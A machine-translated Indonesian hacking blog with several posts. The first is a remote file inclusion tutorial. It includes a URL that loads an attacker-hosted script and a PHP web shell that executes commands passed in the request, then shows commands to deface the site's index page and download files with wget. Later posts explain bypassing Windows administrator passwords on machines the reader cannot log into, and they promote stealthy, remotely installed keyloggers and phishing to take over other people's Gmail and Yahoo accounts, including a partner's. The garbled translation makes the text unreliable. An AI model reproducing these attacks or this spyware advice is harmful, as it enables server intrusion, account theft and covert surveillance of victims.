Seperti yang Anda lihat, situs ini menarik dokumen yang tersimpan dalam format teks dari server dan membuat mereka sebagai halaman web. Kita bisa menemukan cara-cara di sekitarnya karena menggunakan fungsi include PHP untuk menarik mereka keluar .. check it out.

http://example-saja.com/index.php?page=http://hackersite.com/evilscript.txt

Saya telah menyertakan script khusus “eveilscript” dalam format teks dari website saya, yang berisi beberapa kode .. Sekarang .. jika sebuah situs web yang rentan, lalu 3 kasus terjadi -

* Kasus 1 – Anda mungkin telah memperhatikan bahwa url terdiri dari “” halaman = rumah “memiliki ekstensi, tapi aku telah menyertakan ekstensi di url saya, maka situs akan memberikan error seperti” kegagalan untuk memasukkan evilscript.txt.txt “, ini mungkin terjadi sebagai situs dapat secara otomatis menambahkan ekstensi txt. ke halaman yang disimpan dalam server.
* Kasus 2 – Dalam kasus ini, secara otomatis menambahkan sesuatu di baris. Php maka kita harus menggunakan null byte “% 00″ untuk menghindari kesalahan.
* Kasus 3 – eksekusi sukses:)

Sekarang setelah Anda telah berjuang sekitar satu ini, Anda mungkin ingin belajar apa yang harus kode dalam script. Anda dapat mendapatkan kode script custom terkenal C99 (terlalu bloaty tetapi sangat efektif sekali digunakan) atau Anda mungkin kode sendiri yang baru. Untuk pengetahuan tentang PHP mungkin akan berguna. Kita mulai

<?php

echo “<script>alert(U 4r3 0wn3d !!);</script>”;
echo “Run command: “.htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

Kode di atas memungkinkan Anda untuk mengeksploitasi menyertakan fungsi dan tes jika situs jika RFI (XSS) rentan dengan menjalankan kode kotak waspada dan jika berhasil, Anda dapat mengirim perintah khusus ke server linux di bash. Jadi … Jika Anda sedang beruntung dan jika bekerja, mari kita coba tangan kami pada beberapa perintah Linux. Sebagai contoh untuk menemukan direktori kerja saat ini dari server dan kemudian ke file daftar, kita akan menggunakan “pwd” dan “ls” perintah.

http//example-saja.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//example-saja.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

Apakah ia adalah bahwa ia mengirimkan perintah sebagai cmd kita masukkan ke dalam script kami, dan mulai mencetak daftar direktori kerja dan dokumen .. Bahkan lebih baik .. Anda hampir dapat membuat halaman menyatakan bahwa Anda hacked dengan menggunakan “echo” perintah

cmd=echo U r pwn3d by xero> index.php

menulis index.php dan membuat itu .. Dalam kasus ini, sebuah situs primitif nya yang menyimpan halaman dengan. Ekstensi txt, Anda mungkin ingin menempatkan dengan sepanjang files.Now txt. .. Seperti yang diharapkan .. Kami sekarang alpha dan omega dari website:) kita dapat men-download, menghapus, mengubah nama, apa saja! Ingin men-download stuff? coba “wget” fungsi (cmd = wget .. mendapatkan ide ..).. Ingin memindahkannya keluar? “Mv” ..

Aku meninggalkan sisanya pada kreativitas Anda ..

JusT share Bro,,,, jangan disalah gunakan…..okeeh/.///




August 6, 2010

How to Hack Windows Administrator Password

Hack ini akan menunjukkan cara untuk mereset password administrator Windows (untuk Win 2000, XP, Vista dan Win 7) pada waktu Anda lupa atau bila Anda ingin mendapatkan akses ke komputer yang anda tidak tahu password.

Sebagian besar dari kita pernah mengalami situasi di mana kita perlu mendapatkan akses ke komputer yang dilindungi sandi atau pada saat-saat kita lupa password administrator tanpa yang menjadi mustahil untuk login ke komputer. Jadi di sini adalah sangat baik hack menggunakan yang Anda dapat mereset password atau membuat password kosong (menghapus sandi) sehingga Anda bisa mendapatkan akses administrator ke komputer. Anda dapat melakukannya dengan alat kecil bernama Offline NT Password & Registry Editor. Utilitas ini bekerja secara offline, yang berarti Anda perlu untuk mematikan komputer dan boot dari Anda menggunakan floppy disk, CD atau perangkat USB (seperti pen drive). Alat tersebut memiliki beberapa fitur berikut.

* Anda tidak perlu mengetahui password lama untuk menetapkan yang baru
* Akan mendeteksi dan menawarkan untuk membuka terkunci atau dinonaktifkan dari account pengguna!
* Ada juga registry editor dan utilitas registri lain yang bekerja dibawah linux / unix, dan dapat digunakan untuk hal-hal lain selain mengedit sandi.

Bagaimana cara kerjanya?

Sebagian besar sistem operasi Windows menyimpan password login dan password terenkripsi lainnya dalam sebuah file bernama sam (Security Account Manager). File ini dapat biasanya ditemukan di \ windows \ system32 \ config. File ini adalah bagian dari registri Windows dan tetap tidak dapat diakses selama OS aktif. Oleh karena itu perlu bahwa Anda perlu untuk boot dari komputer Anda dan mengakses file sam ini melalui boot. Alat ini dengan cerdas keuntungan akses ke berkas ini dan akan mengatur ulang / menghapus password yang berhubungan dengan administrator atau account lainnya.

Link download untuk kedua CD dan floppy drive beserta petunjuk lengkap diberikan di bawah ini

Offline NT Password & Editor Reg Download

Dianjurkan agar Anda men-download versi CD dari alat sejak floppy drive sudah usang dan tidak ada di komputer saat ini. Setelah Anda men-download Anda akan mendapatkan gambar bootable yang Anda butuhkan untuk membakarnya ke CD. Sekarang boot komputer Anda dari CD ini dan ikuti petunjuk pada layar untuk mengatur ulang sandi.

Cara lain yang sederhana untuk mereset password administrator account non-

Berikut ini adalah cara mudah melalui mana Anda dapat mereset password account non-administrator. Satu-satunya persyaratan untuk ini adalah bahwa Anda perlu memiliki hak administrator. Berikut ini adalah instruksi langkah-demi-langkah untuk menyelesaikan tugas ini.

1. Buka command prompt (ketik Run-> Start-> Masukkan cmd->)

2. Sekarang ketik net user dan tekan Enter

3. Sekarang sistem akan menampilkan daftar account pengguna pada komputer. Katakanlah misalnya Anda perlu me-reset password account dengan nama John, kemudian lakukan hal berikut

4. Jenis pengguna bersih John * dan tekan Enter. Sekarang sistem akan meminta Anda untuk memasukkan password baru untuk account. Itu saja. Sekarang Anda telah berhasil me-reset password untuk John tanpa mengetahui password lamanya.

Jadi dengan cara ini Anda dapat mereset password dari account Windows pada saat Anda lupa sehingga Anda tidak perlu menginstal ulang sistem operasi Anda untuk alasan apapun. Saya harap ini membantu.

August 6, 2010

How to Hack Gmail

Gmail adalah salah satu layanan email yang paling banyak digunakan di seluruh dunia dan itu tidak heran mengapa banyak orang ingin hack Gmail. Jika Anda penasaran ingin tahu cara hack gamil maka ini adalah posting untuk Anda. Di sini, di posting ini saya akan menunjukkan kepada Anda beberapa cara kerja nyata dan untuk hack Gmail dan juga akan membuat Anda sadar akan penipuan umum dan mitos yang terkait dengan hacking

Gmail.

Sebelum saya membahas cara hack Gmail saya ingin membuat pembaca sadar akan penipuan umum dan mitos-mitos berkaitan dengan hacking Gmail atau email lain. Jadi di sini kita pergi

1. Tidak ada perangkat lunak yang siap / program yang akan hack Gmail hanya dengan satu klik tombol. Jadi tidak pernah tertipu oleh sesuatu yang disebut Gmail hacking software. Jika terdapat program seperti untuk hack Gmail maka itu tidak lebih dari scam.

2. Sebagian besar layanan email hacking di internet klaim untuk hack password Gmail hanya biaya yang kecil. Saya pribadi telah banyak diuji layanan tersebut dan menemukan bahwa kebanyakan mereka adalah penipuan.

Pada titik ini Anda mungkin bertanya-tanya apa cara lain untuk hack Gmail lalu. Jadi di sini adalah cara kerja untuk hack Gmail.

Dengan pengalaman saya di bidang hacking dan keamanan saya dapat memberitahu Anda bahwa hanya ada dua cara untuk hack account Gmail.

1. Keylogging

2. Phishing

Metode lain untuk hack Gmail selain kedua hanya scam atau bekerja dont.

Cara termudah untuk Hack Gmail

Cara termudah untuk hack Gmail adalah melalui keylogging. Hal ini dilakukan dengan menggunakan program kecil / software keylogger yang disebut. Keylogger saat ini diinstal di komputer manapun akan menangkap setiap password termasuk keystroke. Juga bekerja dalam modus siluman lengkap dengan sepenuhnya bersembunyi sendiri. Jadi memasang keylogger pada komputer adalah cara termudah untuk hack Gmail. Setelah korban log ke akun Gmail dari komputer ini nya username dan password Gmail ditangkap dan disimpan langsung. Yang tersimpan log yang dikirimkan kepada Anda melalui email. Tetapi bagaimana jika Anda tidak memiliki akses fisik ke komputer? Nah, masih kau tidak perlu khawatir karena saya akan menunjukkan salah satu program keylogger terbaik yang mendukung instalasi pada komputer lokal maupun komputer remote. Berikut ini mendukung instalasi remote juga.

SniperSpy

Jadi untuk hack account Gmail semua yang perlu Anda lakukan adalah menginstal keylogger pada komputer korban yang mungkin untuk login ke account Gmail-nya. Jika Anda tidak memiliki akses fisik maka Anda perlu menggunakan fitur instalasi remote untuk jarak jauh menyebarkan kelogger tersebut.

CATATAN: Untuk informasi lebih lanjut tentang keylogger membaca posting saya Bagaimana menggunakan Keylogger

Cara lain untuk Hack Gmail

Trik lain yang paling sering digunakan untuk hack Gmail menggunakan Fake Login Page (juga disebut sebagai Phishing). Hari ini, halaman login palsu adalah teknik yang paling banyak digunakan untuk hack Gmail. Halaman Palsu Login adalah halaman yang muncul tepat sebagai halaman Login situs seperti Yahoo, Gmail dll Tapi begitu kita masukkan password kita di sana, akhirnya kita kehilangan itu.

Namun membuat halaman login palsu dan mengambil secara online untuk berhasil hack password Gmail bukanlah pekerjaan mudah. Hal ini menuntut pengetahuan teknis mendalam tentang HTML dan bahasa script seperti PHP, JSP dll Jadi jika Anda baru terhadap konsep hacking password, maka saya sarankan menggunakan keyloggers untuk hack Gmail karena itu cara termudah.

August 6, 2010

Yahoo!! Hack

yahoo hack
Setiap hari saya mendapatkan banyak email dari orang yang meminta cara hack password Yahoo? Jadi jika Anda bertanya-tanya untuk mengetahui cara hack Yahoo dan menangkap pasangan selingkuh, gadis / cowok teman maka ini adalah posting untuk Anda. Dalam posting ini saya akan memberikan cara kerja nyata dan hack password Yahoo.
Ya! Sebagai soal fakta itu mungkin untuk hack hampir semua password email. Tetapi sebelum Anda mempelajari cara nyata untuk hack password Yahoo, berikut adalah hal-hal yang Anda harus menyadari.

1. Jangan pernah percaya setiap Layanan yang mengklaim Hacking password Yahoo hack hanya untuk $ 100 atau $ 200. Saya telah mencoba banyak layanan tersebut dan telah menemukan bahwa mereka tidak lebih dari penipuan.

2. Dengan pengalaman saya sekitar 8 tahun di bidang Hacking dan keamanan TI, saya dapat memberitahu Anda bahwa hanya ada DUA cara untuk hack password Yahoo: Mereka Keylogging dan Phishing. Semua metode hacking password lainnya hanya scam atau tidak bekerja! Berikut ini adalah 2 hanya metode pekerjaan yang sangat mudah.

Cara termudah untuk Hack YAHOO

Menggunakan keylogger adalah cara termudah untuk hack password Yahoo. keylogger adalah program kecil yang mencatat setiap keystroke (termasuk password) yang diketik pengguna pada keyboard komputer tertentu’s. Sebuah keylogger juga disebut sebagai program atau perangkat lunak Spy Spy. Untuk menggunakannya Anda tidak perlu memiliki pengetahuan khusus. Siapapun yang memiliki pengetahuan dasar tentang komputer dapat menggunakannya. Dengan pengalaman saya, saya merekomendasikan 2 keyloggers berikut sebagai yang terbaik untuk hacking password Yahoo.

Bagaimana cara menggunakan Yahoo SniperSpy untuk hacking?

Anda dapat hack password Yahoo menggunakan SniperSpy sebagai berikut:

1. Setelah Anda membeli, Anda akan dapat membuat modul instalasi. Anda perlu modul ini ke email ke pengguna remote sebagai lampiran.

2. Ketika remote user menjalankan modul ini akan terinstal diam-diam dan proses pemantauan akan dimulai. Para keystrokes ditangkap dan upload ke server SniperSpy terus.

3. Anda dapat login ke account SniperSpy Anda (Anda mendapatkan ini setelah pembelian) untuk melihat log yang berisi password. Dengan cara ini Anda bisa hack Yahoo atau email dengan menggunakan SniperSpy.

Kerja dari Winspy hampir sama dengan SniperSpy.

Saya tidak punya akses fisik ke komputer target, apakah saya masih dapat menggunakan SniperSpy?

Ya, Anda masih dapat menggunakannya untuk hacking Yahoo. Karena keduanya SniperSpy dan WinSpy menawarkan Fitur Remote Instalasi. Dengan fitur ini adalah mungkin untuk jarak jauh menginstal keylogger pada PC korban. Namun mereka juga dapat bekerja pada komputer lokal.

Setelah saya instal bisa SniperSpy korban datang untuk mengetahui keberadaan tentang itu?

Nomor Korban tidak akan pernah bisa tahu tentang itu keberadaan di komputernya. Ini karena, sekali menginstal keylogger akan berjalan dalam mode siluman total. Tidak seperti program lain itu tidak akan pernah muncul dalam awal-menu, start-up, file program, menambah / menghapus program dan task manager.

Apakah saya dapat ditelusuri kembali jika saya menginstalnya pada beberapa komputer lain?

Tidak, hampir mustahil untuk melacak kembali kepada Anda untuk menginstal keylogger pada PC lain.

Bagaimana aman adalah dengan menggunakan SniperSpy?

SniperSpy benar-benar aman untuk digunakan karena semua database pelanggan tetap rahasia dan pribadi. Mereka tidak mengumpulkan informasi dari sistem anda dan tidak akan menghubungi Anda dengan cara apapun kecuali jika Anda meminta bantuan.

SniperSpy vs WinSpy

Trik lain yang paling sering digunakan untuk hack password Yahoo menggunakan Fake Login Page (juga disebut sebagai Phishing). Hari ini, halaman login palsu adalah teknik yang paling banyak digunakan untuk hack password Yahoo. Halaman Palsu Login adalah halaman yang muncul tepat sebagai halaman Login situs seperti Yahoo, Gmail dll Tapi begitu kita masukkan password kita di sana, akhirnya kita kehilangan itu.

Namun membuat halaman login palsu dan mengambil secara online untuk berhasil hack password Yahoo bukanlah pekerjaan mudah. Hal ini menuntut pengetahuan teknis mendalam tentang HTML dan bahasa script seperti PHP, JSP dll Jadi jika Anda baru terhadap konsep hacking password, maka saya sarankan menggunakan keyloggers untuk hack password Yahoo karena itu cara termudah.

Follow

Get every new post delivered to your Inbox.